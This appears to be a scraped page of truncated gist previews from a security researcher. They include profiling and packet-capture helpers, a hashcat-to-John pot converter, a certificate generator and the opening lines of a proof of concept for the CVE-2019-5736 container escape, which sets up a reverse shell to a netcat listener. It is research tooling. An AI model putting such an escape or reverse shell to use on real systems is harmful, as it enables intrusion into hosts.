Remember to compile with debug.
-
Trace command
sudo dtrace -c '<command>' -o out.stacks -n 'profile-997 /execname == "<command name>"/ { @[ustack(100)] = count(); }' > /dev/null
-
Create Graph
#!/bin/bash | |
# Convert hashcat.pot to john.pot and merge them | |
# Usage: hc-to-john.sh <hashcat pot> <john pot> | |
# NB: Make sure the hashcat pot only contains 16 | |
# and 32 character hashes that are LM and NT hashes | |
tmp1=$(mktemp -t pot-port) | |
tmp2=$(mktemp -t pot-port) | |
hashpot=$1 | |
LC_ALL=UTF-8 sed 's/^\([a-f0-9]\{32\}:[^:]*\)$/$NT$\1/' $hashpot | grep '^\$NT\$' > $tmp1 |
Remember to compile with debug.
Trace command
sudo dtrace -c '<command>' -o out.stacks -n 'profile-997 /execname == "<command name>"/ { @[ustack(100)] = count(); }' > /dev/null
Create Graph
#!/bin/bash | |
one=$1 | |
two=$2 | |
if [[ $one == "" || $two == "" ]]; then | |
echo Display commands to merge two packet captures to the same time | |
echo $0 "<cap one> <cap two> <offset>" | |
exit 1 | |
fi | |
offset=$3 | |
if [[ ! $offset > 0 ]]; then |
Remember to unzip the .docx first, or use scan.sh.
Compile the yara rule for scan.sh to work
yarac canarytoken.yar canarytoken
A Windows Arabic Code Page (CP1256) hashcat charset file. Its use is described by hashcat here. The original blog post describing it can be found at NTHashes and Encodings.
FROM alpine:latest as builder | |
LABEL maintainer="@singe at SensePost <[email protected]>" | |
RUN apk update && apk --no-cache add \ | |
build-base \ | |
&& rm -rf /var/cache/apk/* | |
WORKDIR / | |
COPY yellow.c canary32.c canary32.h / | |
RUN gcc -o yellow yellow.c canary32.c |
#!/bin/bash | |
# Simple CA cert generator & leaf cert signer | |
# By [email protected] | |
# All rights reserved 2019 | |
ca_prefix="ca" | |
leaf_prefix="host" | |
ca_validity="1825" #days | |
leaf_validity="730" #days | |
size=2048 |
#!/bin/python3 | |
# Silly PoC for CVE-2019-5736 in Python by @singe (with help from @_staaldraad, @frichette_n & @_cablethief) | |
# Target will need a python3 interpreter | |
# Edit IP info below, on the host run a netcat to catch the reverse shell | |
# Run this python file in the container | |
# Then from the host: docker exec -i <container name> /tmp/evil | |
import os | |
import stat | |
host='172.17.0.1' |
#!/bin/sh | |
UA="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 Safari/605.1.15" | |
url="https://www.xe.com/currencyconverter/convert/" | |
amount="$1" | |
fromcur="$2" | |
tocur="$3" | |
if [ "$fromcur" == "" ]; then #Use default currencies | |
fromcur="ZAR" | |
tocur="GBP" | |
fi |